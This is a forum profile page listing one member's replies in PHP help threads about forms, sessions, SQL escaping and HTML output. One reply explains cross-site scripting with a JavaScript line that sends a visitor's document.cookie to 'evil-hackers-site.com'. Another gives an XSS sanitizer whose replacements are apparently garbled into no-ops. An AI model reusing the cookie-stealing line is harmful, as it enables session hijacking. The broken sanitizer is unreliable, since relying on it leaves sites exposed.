Daniel0
-
Posts
11,885 -
Joined
-
Last visited
Everything posted by Daniel0
-
How to grab email addresses from a email address book?
Daniel0 replied to a topic in Application Design
What address book? An address book on an online webmail service (like Gmail) or an application on your computer (like Microsoft Outlook's address book)? -
This will work: [code]<?php $query = $config->query("SELECT * FROM $table_users WHERE username='$_SESSION[username]'"); $row = mysql_fetch_array($query); $sex = array('Male','Female'); echo "<select name='sex'>\n"; foreach($sex as $sex) { if($sex == $row['sex']) $selected = $sex==$row['sex'] ? " selected='selected'" : null; echo "\t<option value='{$sex}'{$selected}>{$sex}</option>\n"; } echo "</select>\n"; ?>[/code]
-
Very Confused -- Simple Program to Read Files and Compare
Daniel0 replied to JohnOlivier's topic in PHP Coding Help
Could we see a sample file of the ones you load? -
Interfaces are sort of like templates for classes (PHP5 or higher only). When a class implements an interface, then it must contain the elements that the interface contains. [url=http://php.net/manual/en/language.oop5.interfaces.php]More info on interfaces[/url]
-
I believe that they are working on it as I think the entire main site is being rebuild or something like that.
-
[quote author=pedrobcabral link=topic=110976.msg449433#msg449433 date=1160419559] Is that also prevented with the command spoken above? [/quote] No. For that you would have to do something like this: [code]$t = html_entity_decode($t,ENT_QUOTES); $t = str_replace("<","<",$t); $t = str_replace(">",">",$t); $t = str_replace(""",htmlspecialchars('"'),$t); $t = preg_replace("/�*([0-9]*);?/",'&#\\1;',$t); $t = str_replace('javascript:','javascript:',$t); $t = preg_replace("/javascript:/i","nojava"/*ava*/."script:",$t); $t = preg_replace("/vbscript:/i","novb"/*b*/."script:",$t);[/code] More info on XSS prevention: http://blog.bitflux.ch/wiki/XSS_Prevention
-
No, but use what corresponds to your database structure.
-
Try [tt]session_cache_limiter('none')[/tt] or [tt]session_cache_limiter('nocache')[/tt] on log-off.php
-
It is related. Each time I get that error on SMF I errors similar to the ones you showed on the main page.
-
Inside the loop: [code]$selected = $row['is_selected'] ? " selected='selected'" : null; echo "\n<option value='$row['id']'{$selected}>$row['name']</option>\n";[/code]
-
[quote author=Mutley link=topic=110976.msg449407#msg449407 date=1160417975] Not heard of XSS, is it common? [/quote] Yeah, It's beginning to get quite common, it works like this: 1. User gets redirected to hackers page. Could be like this (javascript): [code]location.href='http://evil-hackers-site.com/harvest_cookies.php?data='+document.cookie;[/code] 2. The page harvests the cookie information 3. The user is redirected back the original page. Here are some information about XSS: http://ha.ckers.org/xss.html http://en.wikipedia.org/wiki/Cross_site_scripting
-
Do you run that code when defining the session variable or at every page load?
-
mysql_real_escape_string would prevent SQL injection. Another thing you need to be vary about is XSS (cross-site scripting) attacks.
-
What error do you get?
-
If you don't already do this, then maybe using persistent connections could take a bit off the MySQL server load.
-
How to tell if there are no results returned give an error
Daniel0 replied to ivalea's topic in PHP Coding Help
[code]if(mysql_num_rows($result)) { while($row = mysql_fetch_assoc($result)) { // do stuff } } else { echo "No such customer"; }[/code] -
Not checking for the field names would be a security issue. Imagine a user registration script like this. Say there is another field called is_admin which defaults to 0 (false) and therefor is not included in the query as it is not needed. The user could send an extra post variable called is_admin with the value 1 (true) and thereby gain administrative rights.
-
I believe that for colors there is a value option called transparent. You could use that for the color attribute.
-
I often (like every second/third day) get a message saying that smf can't connect to the database. I don't know if that is related to this.
-
.htaccess files have same syntax (or whatever to call it) as the httpd.conf file. [code]bla bla #this is a comment bla bla more configuration...[/code]
-
Try this: [code]<?php function out_of_range($value,$min=6,$max=15) { return (strlen(trim($value))<$min || strlen(trim($value))>$max); } if(isset($_POST["submit"])) { $error_msg = array(); if(out_of_range($_POST['name'])) { $error_msg[] = "Please enter a name between 6 to 15 characters long"; } if(out_of_range($_POST['peak'])) { $error_msg[] = "Please enter a peak between 6 to 15 characters long"; } if(out_of_range($_POST['offpeak'])) { $error_msg[] = "Please enter a off peak between 6 to 15 characters long"; } if(out_of_range($_POST['peaknet'])) { $error_msg[] = "Please enter a peaknet between 6 to 15 characters long"; } if(out_of_range($_POST['offpeaknet'])) { $error_msg[] = "Please enter a offpeaknet between 6 to 15 characters long"; } if(out_of_range($_POST['txt'])) { $error_msg[] ="Please enter a txt between 6 to 15 characters long"; } if(out_of_range($_POST['picture'])) { $error_msg[] = "Please enter a picture between 6 to 15 characters long"; } if(count($error_msg)<=0) { $name = mysql_real_escape_string($_POST["name"]); $peak = mysql_real_escape_string($_POST["peak"]); $offpeak = mysql_real_escape_string($_POST["offpeak"]); $peaknet = mysql_real_escape_string($_POST["peaknet"]); $offpeaknet = mysql_real_escape_string($_POST["offpeaknet"]); $txt = mysql_real_escape_string($_POST["txt"]); $picture = mysql_real_escape_string($_POST["picture"]); $connection = mysql_connect("", "", ""); mysql_select_db("neil", $connection) or die("Unable to select database: ".mysql_error()); mysql_query("INSERT INTO sims VALUES ('','$name','$peak','$peaknet','$offpeaknet','$offpeak','$txt','$picture')") or die(mysql_error()); mysql_close($connection); echo "New sim sucessfully created"; } else { echo "<span style='font-weight: bold; color: red;'>Error(s):</span><br /><ul><li>"; echo join('</li><li>',$error_msg); echo "</ul>"; } } else { // show form } ?>[/code]
-
Change [code]array_push($data, $sourcename=>array("cases"=>"0","inds"=>"0"));[/code] to [code]$sourcename = array_merge($source_name,array("cases"=>"0","inds"=>"0")); array_push($data, $sourcename);[/code]
-
In my opinion you shouldn't even use tables for this purpose as tables are for tabular data.
-
Try something like this (I haven't tested it): [code]<?php $smileys = array( 'smile' => ':)', 'smiley2' => ':D', ); foreach($smileys as $image => $code) { $images[] = "<img src='smileys/{$image}.gif' alt='{$code}' />"; } $text = str_replace($smileys,$images,$text); ?>[/code]
-
Admin, (Guest), Members, (Unvalidated members), (Moderators)